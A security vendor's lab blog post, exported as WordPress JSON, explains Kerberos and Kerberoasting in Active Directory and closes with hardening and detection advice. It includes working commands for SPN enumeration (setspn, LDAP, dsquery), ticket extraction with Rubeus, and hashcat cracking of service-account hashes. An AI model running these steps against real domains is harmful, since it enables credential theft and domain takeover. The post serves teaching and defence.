{"id":2172,"date":"2024-09-25T12:05:31","date_gmt":"2024-09-25T12:05:31","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2172"},"modified":"2025-07-29T03:24:04","modified_gmt":"2025-07-29T03:24:04","slug":"active-directory-penetration-dojo-spn-tickets-and-kerberoasting","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/active-directory-penetration-dojo-spn-tickets-and-kerberoasting\/","title":{"rendered":"Active Directory Penetration Dojo \u2013 SPN Tickets and Kerberoasting"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-1024x1024.webp\" alt=\"Active Directory Penetration Dojo \u2013 SPN Tickets and Kerberoasting\" class=\"wp-image-2176\" srcset=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-1024x1024.webp 1024w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-300x300.webp 300w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-150x150.webp 150w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Dojo5-768x768.webp 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Hi everyone, we\u2019ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you\u2019ve not yet read that, please find that here in <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-setup-of-ad-penetration-lab-part-1\/\">[Part 1]<\/a>&nbsp;and <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-setup-of-ad-penetration-lab-part-2\/\">[Part 2]<\/a>. We\u2019ve also understood trust relationships in AD environment which can be checked in the blogpost <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-creation-of-forest-trust-part-3\/\">[here]<\/a>. Finally, we also did Active Directory enumeration which was discussed in part 4 of this series <a href=\"https:\/\/lmntrix.com\/lab\/active-directory-penetration-dojo-ad-environment-enumeration-1\/\">[here]<\/a>.<\/p>\n\n\n\n<p>Let\u2019s have a look at the current post in which we\u2019ll discuss how to enumerate an active directory domain for the service accounts and perform Kerberoasting attack.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Kerberos<\/strong><strong>:<\/strong><\/h2>\n\n\n\n<p>To understand Kerberos based attacks, let\u2019s first understand what Kerberos is, and how it works in Microsoft Active Directory Environments. Kerberos is used as the default authentication protocol used by Microsoft Windows. Kerberos authentication protocol was named after Cerberus (a big 3 headed dog) who guards the Gates to the Underworld according to myth. MIT used this name and similar kind of logo for the authentication protocol. In Windows 2000, Microsoft introduced their version of Kerberos and became the standard for SSO for other applications as well. Using the strong cryptography and third-party ticket authorization, it is surely an effective authentication protocol, but there are few flaws in its design which we will discuss so that we can understand the different attacks based on abusing Kerberos authentication flow.<\/p>\n\n\n\n<p>In case of Kerberos, there is a Key Distribution Centre that includes below components:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Authentication server (AS)<\/strong> \u2013 <em>Performs the initial authentication and ticket for Ticket Granting Service<\/em><\/li>\n\n\n\n<li><strong>Database<\/strong> \u2013 <em>Used by authentication server to verify access rights of users<\/em><\/li>\n\n\n\n<li><strong>Ticket Granting Server (TGS) &#8211;<\/strong> <em>Issues the ticket for the Servers<\/em><\/li>\n<\/ol>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"312\" height=\"246\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/1-37.webp\" alt=\"\" class=\"wp-image-2173\"\/><\/figure>\n<\/div>\n\n\n<p>For Kerberos authentication, both the client and the server are required to be verified. Let us suppose that a client wants to connect to a target server and access a particular service on it. The client will first verify itself to the KDC (Key Distribution Centre).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>Below are the overall steps to get verified successfully to the KDC:<\/u><\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The client first connects with the Authentication Server<\/li>\n\n\n\n<li>The client then presents its User ID to the Authentication Server<\/li>\n\n\n\n<li>And the client requests a ticket to the targeted server<\/li>\n<\/ul>\n\n\n\n<p>Let\u2019s understand it in detail. Now the request is partially encrypted with the requesting user&#8217;s password\u2019s secret key. This is done so that the cleartext password isn&#8217;t sent over the insecure network. The Authentication Server verifies the user by using the password to decrypt the request.<\/p>\n\n\n\n<p>Once the client is verified, the Authentication Server sends a <strong>TGT<\/strong> (<strong>Ticket Granting Ticket<\/strong>) to the client which is encrypted with a different secret key. Now the client has the <strong>TGT<\/strong> and if the user wants to access a particular service running on the target server, the client requests the <strong>TGS<\/strong> by sending its <strong>TGT<\/strong> with the request to access the target server.<\/p>\n\n\n\n<p>Once the <strong>TGS<\/strong> receives the <strong>TGT<\/strong>, it decrypts it with the secret key that he shares with the Authentication Server and issues a token for the client, that it encrypts with another key. This third key is shared between the TGS and the targeted server.<\/p>\n\n\n\n<p>Finally, the client sends the service ticket (token) to the targeted server which will decrypt the token with the TGS shared key. And now the client can use the targeted server.<\/p>\n\n\n<div class=\"wp-block-image size-full wp-image-2515\">\n<figure class=\"aligncenter\"><img decoding=\"async\" width=\"507\" height=\"317\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/2-36.webp\" alt=\"\" class=\"wp-image-2174\"\/><figcaption class=\"wp-element-caption\">Figure 1. Kerberos Authentication process<\/figcaption><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading\"><strong>Keys that are used in Kerberos authentication process<\/strong><\/h2>\n\n\n\n<p>Three different secret keys are used in the Kerberos authentication process.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\n<ol class=\"wp-block-list\">\n<li>The first key between the client and the AS is based on the client\u2019s password.<\/li>\n\n\n\n<li>The AS and the TGS share another secret key.<\/li>\n\n\n\n<li>The TGS and the targeted server.<\/li>\n<\/ol>\n<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Introduction to Kerberoasting<\/strong><\/h2>\n\n\n\n<p>In Kerberoasting attack, an attacker steals the service ticket, that is encrypted with RC4 and bruteforces its hash offline to extract its password. Kerberoasting attack takes advantage of legacy Active Directory support for older Windows clients and the type of encryption used and the key material used to encrypt and sign Kerberos tickets.<\/p>\n\n\n\n<p>In the Figure 1, (Kerberos authentication process), Kerberoasting attack is focussed on the step 3 where user gets the service ticket for the target service. And it does not connect to the target server and instead retrieves the service ticket for the target service and performs brute force attack on it to crack the password for the service account running the service on the target server.<\/p>\n\n\n<div class=\"wp-block-image size-full wp-image-2516\">\n<figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"674\" height=\"421\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3-35.webp\" alt=\"\" class=\"wp-image-2175\"\/><figcaption class=\"wp-element-caption\">Figure 2. Kerberoasting<\/figcaption><\/figure>\n<\/div>\n\n\n<p>When a domain account is configured to run a service in the environment, such as in case of Microsoft SQL, a SPN (Service Principal Name) is used in the domain to associate the service with a login account. When a user needs to use the specific resource in the domain, they receive a Kerberos ticket signed with NTLM hash of the account that is running the service.<\/p>\n\n\n\n<p>Note that any valid Active Directory domain user can make a request for SPN for any registered service (mostly we have seen MS SQL and IIS) and once the Kerberos ticket is received, it can be cracked offline. This is significant because in most of the cases, a service account is at least an administrator on the target server.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>SPN (Service Principal Name)<\/strong><\/h2>\n\n\n\n<p>In windows environments, a service principal name (SPN) is referred to be a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name. Below is the reference for more details on service principal names-<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div class=\"wp-block-embed__wrapper\">\nhttps:\/\/docs.microsoft.com\/en-us\/windows\/win32\/ad\/service-principal-names\n<\/div><\/figure>\n\n\n\n<p>The first step in the Kerberoasting attack is to find out all the Service Principal Names in the environment. This can be done either by using raw LDAP queries or by using utilities such as setspn which is builtin utility or by using third party\/open-source scripts which we\u2019ll discuss in next section.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Discovering SPN Ticket<\/strong><\/h2>\n\n\n\n<p>A very simple way to discover all the present SPN tickets on a Windows Active Directory environment is by using the setspn utility by entering the below command:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">setspn&nbsp;-t&nbsp;domainname&nbsp;-q&nbsp;*\/*<\/pre>\n\n\n\n<p><strong><u>Note<\/u><\/strong><strong>-: setspn<\/strong> is a native windows binary which can be used to retrieve the mapping between user accounts and services. This utility can add, delete or view SPN registrations.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>SPN Discovery using LDAP query:<\/u><\/strong><\/h3>\n\n\n\n<p>SPN can also be queried by utilizing the LDAP queries. The query to enumerate SPNs is as follows:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">(&amp;(objectClass=user)(objectcategory=user)(servicePrincipalName=*))<\/pre>\n\n\n\n<p>Note: <em>SPN can also be queried by using dsquery utility by using below command:<\/em><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">dsquery&nbsp;*&nbsp;\"ou=domain&nbsp;controllers,dc=yourdomain,dc=com\"&nbsp;-filter&nbsp;\"(&amp;(objectcategory=computer)(servicePrincipalName=*))\"&nbsp;-attr&nbsp;distinguishedName&nbsp;servicePrincipalName&nbsp;&gt;&nbsp;list_of_spns.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>SPN Discovery using inbuilt SetSPN utility:<\/u><\/strong><\/h3>\n\n\n\n<p>Below is how the output looks like from SetSPN utility.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"641\" height=\"259\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture4.webp\" alt=\"\" class=\"wp-image-2177\"\/><\/figure>\n<\/div>\n\n\n<p>As you can see in the screenshot above, it shows the SPN is for SQL Server account which is running with account <strong><em>SVC_SQL_Service<\/em><\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>Additionally, few other tools can also be used to do the SPN discovery such as:<\/u><\/strong><\/h3>\n\n\n\n<p>Rubues (<a href=\"https:\/\/github.com\/GhostPack\/Rubeus\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/GhostPack\/Rubeus<\/a>)<\/p>\n\n\n\n<p>GetUserSPNs from Impacket<\/p>\n\n\n\n<p>PowerShell AD Recon<\/p>\n\n\n\n<p>Empire<\/p>\n\n\n\n<p>PowerShellery(<a href=\"https:\/\/github.com\/nullbind\/Powershellery\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/nullbind\/Powershellery<\/a>) etc.<\/p>\n\n\n\n<p>Once the enumeration of service accounts and SPNs is done, the attacker then requests Kerberos ticket-granting service tickets for the services, extracts the hashes from memory, and saves them for later offline brute force.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Performing Kerberoasting Attack<\/strong><\/h2>\n\n\n\n<p>The service account <a href=\"mailto:SVC_SQL_Service@scriptdotsh.local\">SVC_SQL_Service@scriptdotsh.local<\/a> is of a domain user with domain admin privileges to run the SQL Server service. Let us perform the kerberoasting attack to request the ticket for it. To perform Kerberoasting attack, we can use the tools such as Rubues (<a href=\"https:\/\/github.com\/GhostPack\/Rubeus\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/GhostPack\/Rubeus<\/a>) that can fully automate this process.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PS&gt;&nbsp;.\\Rubeus.exe&nbsp;kerberoast&nbsp;\/simple&nbsp;\/outfile:myhash.txt\n\n[*]&nbsp;Action:&nbsp;Kerberoasting\n\n[*]&nbsp;NOTICE:&nbsp;AES&nbsp;hashes&nbsp;will&nbsp;be&nbsp;returned&nbsp;for&nbsp;AES-enabled&nbsp;accounts.\n\n[*]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Use&nbsp;\/ticket:X&nbsp;or&nbsp;\/tgtdeleg&nbsp;to&nbsp;force&nbsp;RC4_HMAC&nbsp;for&nbsp;these&nbsp;accounts.\n\n[*]&nbsp;Searching&nbsp;the&nbsp;current&nbsp;domain&nbsp;for&nbsp;Kerberoastable&nbsp;users\n\n[*]&nbsp;Total&nbsp;kerberoastable&nbsp;users&nbsp;:&nbsp;2\n\n[*]&nbsp;Hash&nbsp;written&nbsp;to&nbsp;C:\\Rubues\\myhash.txt&nbsp;\n\n[*]&nbsp;Roasted&nbsp;hashes&nbsp;written&nbsp;to&nbsp;:&nbsp;C:\\Rubues\\myhash.txt<\/pre>\n\n\n\n<p>For demonstration, we have hosted the <a href=\"https:\/\/github.com\/EmpireProject\/Empire\/blob\/master\/data\/module_source\/credentials\/Invoke-Kerberoast.ps1\" target=\"_blank\" rel=\"noopener\">Kerberoast.ps1 script<\/a> on a remote system and ran the Powershell to run that to get the ticket in hashcat format.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"579\" height=\"577\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5.webp\" alt=\"\" class=\"wp-image-2178\" srcset=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5.webp 579w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5-300x300.webp 300w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture5-150x150.webp 150w\" sizes=\"(max-width: 579px) 100vw, 579px\" \/><\/figure>\n<\/div>\n\n\n<p>In the output, we have ticket in hashcat format that we can crack in hashcat.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Cracking the ticket offline:<\/strong><\/h2>\n\n\n\n<p>Once the kerberoasting is done, the ticket can be saved in a file for example myhash.txt. Any Kerberos tickets gathered by the GetUserSPNs script is directly crackable with Hashcat without any additional conversion. Let\u2019s open hashcat and type command.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hashcat&nbsp;-m&nbsp;13100&nbsp;-a&nbsp;0&nbsp;myhash.txt&nbsp;rockyou.txt&nbsp;-o&nbsp;pass.txt<br><strong><u>Command<\/u><\/strong><strong>: <\/strong><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"575\" height=\"455\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture6.webp\" alt=\"\" class=\"wp-image-2179\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">hashcat&nbsp;-m&nbsp;13100&nbsp;-a&nbsp;0&nbsp;myhash.txt&nbsp;rockyou.txt&nbsp;-o&nbsp;pass.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><u>For those that have never used hashcat, essentially the command above is:<\/u><\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>hashcat: Running executable file on linux<\/li>\n\n\n\n<li>-m 13100: Specifying the hash type, this is called a mask. In this case we&#8217;re instructing it to use Kerberos 5, etype 23, TGS-REP.<\/li>\n\n\n\n<li>myhash.txt: This is where the hash file is, this could be called anything. We&#8217;ve named the file myhash.txt as shown in the screen capture above.<\/li>\n\n\n\n<li>rockyou.txt: This is a wordlist we&#8217;re going to try the hash against to try and extract the cleartext password.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Cleartext password:<\/strong><\/h2>\n\n\n\n<p>Once hashcat is able to crack the password, we\u2019ll see the status as cracked and in the output file, we can see highlighted the password.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"539\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/Picture7.webp\" alt=\"\" class=\"wp-image-2180\"\/><\/figure>\n<\/div>\n\n\n<p>As the password is cracked, the attacker can use these credentials of account SVC_SQL_Service to authenticate to any resources this service account has access to, allowing them to compromise data or to do privilege escalation and to perform lateral movement in the Active Directory environment. In this demonstration, the service account is domain administrator, it can be used to perform dcsync and dump credentials of all domain users and, also create golden ticket for persistence. We\u2019ll discuss these attacks in upcoming posts.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Best practices for Service Accounts:<\/strong><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>It is always recommended to restrict the domain admin accounts from being used as service accounts.<\/li>\n\n\n\n<li>Since the service account hash is attempted to be cracked, it is recommended to use complex passwords and other credentials best practices that make the brute-forcing process significantly more time-consuming against the standard wordlist.<\/li>\n\n\n\n<li>Also ensure the passwords for service accounts are changed on a regular basis.<\/li>\n\n\n\n<li>Make sure to restrict the usage of insecure algorithms like RC4 in Kerberos and especially for service accounts. Instead, configure service accounts to negotiate using AES-128 and AES-256 encryption algorithms only.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Detection of Kerberoasting Attacks<\/strong><\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><em>Audit Service Ticket Operations.<\/em><\/strong><\/h3>\n\n\n\n<p>To detect Kerberoasting attacks, we need to enable Kerberos service ticket request logging and need to monitor all the activity such as the domain user accounts requesting large numbers of service tickets (Windows Event ID 4769).<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong><em>Using AD Decoy Accounts<\/em><\/strong><\/h3>\n\n\n\n<p>Similar to how we do with our <a href=\"https:\/\/lmntrix.com\/\">Active Defense<\/a> using the <a href=\"https:\/\/lmntrix.com\/lmntrix-deceive\/\">LMNTRIX XDR Deceive element<\/a>, blue teams can set the traps within the organization Active Directory environment by using the Active Directory decoy accounts and enable audit logging on them. These decoy accounts can act as a normal service account and generate an alert when an interaction is done. The concept is similar to the Server Decoys which immobilizes attackers doing reconnaissance through Active Directory with legitimate service names.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Next Steps<\/strong><\/h2>\n\n\n\n<p>As enterprises grow and evolve, their Active Directory can get very complex and difficult to maintain. The constantly evolving security enhancements and configuration options results in enterprises failing to correctly maintain their Active Directory environments.<\/p>\n\n\n\n<p>Our <a href=\"https:\/\/lmntrix.com\/active-directory-security-assessment\/\">Active Directory Security Assessment<\/a> assists enterprises enhance their processes, configurations, as well as security and monitoring controls necessary to effectively secure an Active Directory environment. It was developed based on extensive red teaming and <a href=\"https:\/\/lmntrix.com\/\">Active Defense<\/a> experience from our<a href=\"https:\/\/lmntrix.com\/cdc\/\"> cyber defense centre<\/a> defending clients around the globe.<\/p>\n\n\n\n<p>For more information <a href=\"https:\/\/lmntrix.com\/contact\/\">contact us<\/a>.<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi everyone, we&rsquo;ve discussed basics of Active Directory and different servers in AD in previous blog posts of this series. If you&rsquo;ve not yet read that, please find that here in [Part 1]&nbsp;and [Part 2]. We&rsquo;ve also understood trust relationships in AD environment which can be checked in the blogpost [here]. Finally, we also did [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2176,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2172","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2172","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2172"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2172\/revisions"}],"predecessor-version":[{"id":4211,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2172\/revisions\/4211"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2176"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2172"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2172"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2172"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}